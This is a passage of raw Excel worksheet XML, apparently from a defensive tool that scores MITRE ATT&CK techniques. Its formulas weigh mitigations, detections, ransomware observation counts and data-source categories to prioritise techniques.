      <c r="AI299" s="37" t="str" cm="1">
        <f t="array" ref="AI299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD299)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ299" s="37">
        <v>295</v>
      </c>
      <c r="AK299" s="37" t="str" cm="1">
        <f t="array" ref="AK299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL299" s="37">
        <v>295</v>
      </c>
      <c r="AM299" s="37" t="str" cm="1">
        <f t="array" ref="AM299">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD299)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN299" s="37">
        <v>0</v>
      </c>
      <c r="AO299" s="37">
        <v>0</v>
      </c>
      <c r="AP299" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ299" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>79.670578682539698</v>
      </c>
      <c r="AR299" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS299" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT299" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU29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00" spans="1:47" ht="51">
      <c r="A300" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B300" s="37">
        <f t="shared" si="4"/>
        <v>239.82125928571432</v>
      </c>
      <c r="C300" s="37" t="s">
        <v>1059</v>
      </c>
      <c r="D300" s="50" t="s">
        <v>1057</v>
      </c>
      <c r="E300" s="37" t="s">
        <v>1060</v>
      </c>
      <c r="F300" s="37">
        <v>1</v>
      </c>
      <c r="G300" s="37">
        <v>0</v>
      </c>
      <c r="H300" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I300" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J300" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K300" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L300" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M300" s="37">
        <v>0</v>
      </c>
      <c r="N300" s="56">
        <v>0</v>
      </c>
      <c r="O300" s="56">
        <v>2</v>
      </c>
      <c r="P300" s="56">
        <v>0</v>
      </c>
      <c r="Q300" s="56">
        <v>0</v>
      </c>
      <c r="R300" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S300" s="57">
        <v>5</v>
      </c>
      <c r="T300" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U300" s="57">
        <v>10</v>
      </c>
      <c r="V300" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.15238080952380953</v>
      </c>
      <c r="W300" s="37">
        <v>15</v>
      </c>
      <c r="X300" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y300" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z300" s="37">
        <v>2</v>
      </c>
      <c r="AA300" s="37">
        <v>0.02</v>
      </c>
      <c r="AB300" s="37">
        <v>0.02</v>
      </c>
      <c r="AC300" s="37"/>
      <c r="AD300" s="50" t="s">
        <v>1058</v>
      </c>
      <c r="AE300" s="37" t="str" cm="1">
        <f t="array" ref="AE300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF300" s="37">
        <v>296</v>
      </c>
      <c r="AG300" s="37" t="str" cm="1">
        <f t="array" ref="AG300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD300)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH300" s="37">
        <v>296</v>
      </c>
      <c r="AI300" s="37" t="str" cm="1">
        <f t="array" ref="AI300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD300)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ300" s="37">
        <v>296</v>
      </c>
      <c r="AK300" s="37" t="str" cm="1">
        <f t="array" ref="AK300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL300" s="37">
        <v>296</v>
      </c>
      <c r="AM300" s="37" t="str" cm="1">
        <f t="array" ref="AM300">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD300)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN300" s="37">
        <v>0</v>
      </c>
      <c r="AO300" s="37">
        <v>0</v>
      </c>
      <c r="AP300" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ300" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>79.940419761904778</v>
      </c>
      <c r="AR300" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS300" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT300" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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01" spans="1:47" ht="51">
      <c r="A301" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B301" s="37">
        <f t="shared" si="4"/>
        <v>229.306973</v>
      </c>
      <c r="C301" s="37" t="s">
        <v>1061</v>
      </c>
      <c r="D301" s="50" t="s">
        <v>1057</v>
      </c>
      <c r="E301" s="37" t="s">
        <v>1062</v>
      </c>
      <c r="F301" s="37">
        <v>1</v>
      </c>
      <c r="G301" s="37">
        <v>0</v>
      </c>
      <c r="H301" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I301" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J301" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K301" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L301" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M301" s="37">
        <v>0</v>
      </c>
      <c r="N301" s="56">
        <v>0</v>
      </c>
      <c r="O301" s="56">
        <v>0</v>
      </c>
      <c r="P301" s="56">
        <v>0</v>
      </c>
      <c r="Q301" s="56">
        <v>0</v>
      </c>
      <c r="R301" s="57" t="s">
        <v>1039</v>
      </c>
      <c r="S301" s="57">
        <v>5</v>
      </c>
      <c r="T301" s="57" t="s">
        <v>1040</v>
      </c>
      <c r="U301" s="57">
        <v>10</v>
      </c>
      <c r="V301" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14285700000000001</v>
      </c>
      <c r="W301" s="37">
        <v>15</v>
      </c>
      <c r="X301" s="37">
        <v>0.272727</v>
      </c>
      <c r="Y301" s="37">
        <v>0.272727</v>
      </c>
      <c r="Z301" s="37">
        <v>0</v>
      </c>
      <c r="AA301" s="37">
        <v>0</v>
      </c>
      <c r="AB301" s="37">
        <v>0</v>
      </c>
      <c r="AC301" s="37"/>
      <c r="AD301" s="50" t="s">
        <v>1058</v>
      </c>
      <c r="AE301" s="37" t="str" cm="1">
        <f t="array" ref="AE301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD301)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF301" s="37">
        <v>297</v>
      </c>
      <c r="AG301" s="37" t="str" cm="1">
        <f t="array" ref="AG301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD301)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH301" s="37">
        <v>297</v>
      </c>
      <c r="AI301" s="37" t="str" cm="1">
        <f t="array" ref="AI301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD301)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ301" s="37">
        <v>297</v>
      </c>
      <c r="AK301" s="37" t="str" cm="1">
        <f t="array" ref="AK301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD301)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL301" s="37">
        <v>297</v>
      </c>
      <c r="AM301" s="37" t="str" cm="1">
        <f t="array" ref="AM301">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD301)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN301" s="37">
        <v>0</v>
      </c>
      <c r="AO301" s="37">
        <v>0</v>
      </c>
      <c r="AP301" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ301" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>76.435657666666671</v>
      </c>
      <c r="AR301" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS301" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT301" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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02" spans="1:47" ht="17">
      <c r="A302" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B302" s="37">
        <f t="shared" si="4"/>
        <v>372.10232414285713</v>
      </c>
      <c r="C302" s="37" t="s">
        <v>1063</v>
      </c>
      <c r="D302" s="50" t="s">
        <v>1064</v>
      </c>
      <c r="E302" s="37"/>
      <c r="F302" s="37">
        <v>1</v>
      </c>
      <c r="G302" s="37">
        <v>0</v>
      </c>
      <c r="H302" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I302" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J302" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K302" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L302" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M302" s="37">
        <v>0</v>
      </c>
      <c r="N302" s="56">
        <v>0</v>
      </c>
      <c r="O302" s="56">
        <v>1</v>
      </c>
      <c r="P302" s="56">
        <v>0</v>
      </c>
      <c r="Q302" s="56">
        <v>0</v>
      </c>
      <c r="R302" s="57" t="s">
        <v>1065</v>
      </c>
      <c r="S302" s="57">
        <v>11</v>
      </c>
      <c r="T302" s="57" t="s">
        <v>1066</v>
      </c>
      <c r="U302" s="57">
        <v>16</v>
      </c>
      <c r="V302" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.26190471428571427</v>
      </c>
      <c r="W302" s="37">
        <v>27</v>
      </c>
      <c r="X302" s="37">
        <v>0.49090899999999998</v>
      </c>
      <c r="Y302" s="37">
        <v>0.49090899999999998</v>
      </c>
      <c r="Z302" s="37">
        <v>1</v>
      </c>
      <c r="AA302" s="37">
        <v>0.01</v>
      </c>
      <c r="AB302" s="37">
        <v>0.01</v>
      </c>
      <c r="AC302" s="37"/>
      <c r="AD302" s="50" t="s">
        <v>1067</v>
      </c>
      <c r="AE302" s="37" t="str" cm="1">
        <f t="array" ref="AE302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF302" s="37">
        <v>298</v>
      </c>
      <c r="AG302" s="37" t="str" cm="1">
        <f t="array" ref="AG302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH302" s="37">
        <v>298</v>
      </c>
      <c r="AI302" s="37" t="str" cm="1">
        <f t="array" ref="AI302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ302" s="37">
        <v>298</v>
      </c>
      <c r="AK302" s="37" t="str" cm="1">
        <f t="array" ref="AK302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD302)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL302" s="37">
        <v>298</v>
      </c>
      <c r="AM302" s="37" t="str" cm="1">
        <f t="array" ref="AM302">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD302)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN302" s="37">
        <v>0</v>
      </c>
      <c r="AO302" s="37">
        <v>0</v>
      </c>
      <c r="AP302" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ302" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>124.03410804761904</v>
      </c>
      <c r="AR302" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS302" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT302" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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03" spans="1:47" ht="68">
      <c r="A303" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B303" s="37">
        <f t="shared" si="4"/>
        <v>88.704312000000002</v>
      </c>
      <c r="C303" s="37" t="s">
        <v>1068</v>
      </c>
      <c r="D303" s="50" t="s">
        <v>1069</v>
      </c>
      <c r="E303" s="37"/>
      <c r="F303" s="37">
        <v>1</v>
      </c>
      <c r="G303" s="37">
        <v>0</v>
      </c>
      <c r="H303" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I303" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J303" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K303" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L303" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M303" s="37">
        <v>2.9599999999999998E-4</v>
      </c>
      <c r="N303" s="56">
        <v>0</v>
      </c>
      <c r="O303" s="56">
        <v>4</v>
      </c>
      <c r="P303" s="56">
        <v>1</v>
      </c>
      <c r="Q303" s="56">
        <v>0</v>
      </c>
      <c r="R303" s="57"/>
      <c r="S303" s="57">
        <v>0</v>
      </c>
      <c r="T303" s="57"/>
      <c r="U303" s="57">
        <v>0</v>
      </c>
      <c r="V303" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>2.3809523809523808E-2</v>
      </c>
      <c r="W303" s="37">
        <v>0</v>
      </c>
      <c r="X303" s="37">
        <v>0</v>
      </c>
      <c r="Y303" s="37">
        <v>0</v>
      </c>
      <c r="Z303" s="37">
        <v>5</v>
      </c>
      <c r="AA303" s="37">
        <v>0.05</v>
      </c>
      <c r="AB303" s="37">
        <v>0.05</v>
      </c>
      <c r="AC303" s="37"/>
      <c r="AD303" s="50" t="s">
        <v>1070</v>
      </c>
      <c r="AE303" s="37" t="str" cm="1">
        <f t="array" ref="AE303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF303" s="37">
        <v>299</v>
      </c>
      <c r="AG303" s="37" t="str" cm="1">
        <f t="array" ref="AG303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH303" s="37">
        <v>299</v>
      </c>
      <c r="AI303" s="37" t="str" cm="1">
        <f t="array" ref="AI303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ303" s="37">
        <v>299</v>
      </c>
      <c r="AK303" s="37" t="str" cm="1">
        <f t="array" ref="AK303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD303)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL303" s="37">
        <v>299</v>
      </c>
      <c r="AM303" s="37" t="str" cm="1">
        <f t="array" ref="AM303">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD303)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN303" s="37">
        <v>0</v>
      </c>
      <c r="AO303" s="37">
        <v>0</v>
      </c>
      <c r="AP303" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ303" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>29.568104000000002</v>
      </c>
      <c r="AR303" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS303" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT303" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU30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04" spans="1:47" ht="34">
      <c r="A304" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="B304" s="37">
        <f t="shared" si="4"/>
        <v>531.54195423809529</v>
      </c>
      <c r="C304" s="37" t="s">
        <v>1071</v>
      </c>
      <c r="D304" s="50" t="s">
        <v>1072</v>
      </c>
      <c r="E304" s="37"/>
      <c r="F304" s="37">
        <v>1</v>
      </c>
      <c r="G304" s="37">
        <v>1</v>
      </c>
      <c r="H304" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I304" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J304" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K304" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L304" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M304" s="37">
        <v>0.33305899999999999</v>
      </c>
      <c r="N304" s="56">
        <v>0</v>
      </c>
      <c r="O304" s="56">
        <v>0</v>
      </c>
      <c r="P304" s="56">
        <v>1</v>
      </c>
      <c r="Q304" s="56">
        <v>1</v>
      </c>
      <c r="R304" s="57"/>
      <c r="S304" s="57">
        <v>0</v>
      </c>
      <c r="T304" s="57"/>
      <c r="U304" s="57">
        <v>0</v>
      </c>
      <c r="V304" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W304" s="37">
        <v>0</v>
      </c>
      <c r="X304" s="37">
        <v>0</v>
      </c>
      <c r="Y304" s="37">
        <v>0</v>
      </c>
      <c r="Z304" s="37">
        <v>2</v>
      </c>
      <c r="AA304" s="37">
        <v>0.02</v>
      </c>
      <c r="AB304" s="37">
        <v>0.02</v>
      </c>
      <c r="AC304" s="37"/>
      <c r="AD304" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE304" s="37" t="str" cm="1">
        <f t="array" ref="AE304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD304)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF304" s="37">
        <v>300</v>
      </c>
      <c r="AG304" s="37" t="str" cm="1">
        <f t="array" ref="AG304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH304" s="37">
        <v>300</v>
      </c>
      <c r="AI304" s="37" t="str" cm="1">
        <f t="array" ref="AI304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ304" s="37">
        <v>300</v>
      </c>
      <c r="AK304" s="37" t="str" cm="1">
        <f t="array" ref="AK304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL304" s="37">
        <v>300</v>
      </c>
      <c r="AM304" s="37" t="str" cm="1">
        <f t="array" ref="AM304">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD304)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN304" s="37">
        <v>0</v>
      </c>
      <c r="AO304" s="37">
        <v>4</v>
      </c>
      <c r="AP304" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.43333333333333335</v>
      </c>
      <c r="AQ304" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>177.18065141269844</v>
      </c>
      <c r="AR304" s="37">
